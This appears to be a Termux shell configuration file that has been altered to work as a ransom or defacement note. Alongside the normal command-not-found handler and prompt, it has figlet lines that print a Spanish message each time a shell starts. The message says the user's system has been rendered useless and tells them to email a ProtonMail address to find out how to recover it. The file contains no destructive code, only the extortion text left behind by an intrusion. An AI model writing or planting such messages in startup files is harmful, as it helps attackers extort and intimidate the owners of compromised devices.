if [ -x /data/data/com.termux/files/usr/libexec/termux/command-not-found ]; then
        command_not_found_handle() {
                /data/data/com.termux/files/usr/libexec/termux/command-not-found "$1"
        }
fi
                                                                                                                                          
PS1='\$ '

echo "==================================================================================================================================="

figlet -t -k -c Te preguntaras que ha pasado? Te he dejado inutil tu sistema, te mereces que te protejamos. Asi aprenderas lo que
figlet -t -k -c tienes  
figlet -t -k -c que hacer en el ciberespacio. Contadtame; Viphops3r@protonmail.ch
figlet -t -k -c Asi sabras como recuperar tu sistema....

   
echo "==================================================================================================================================="  
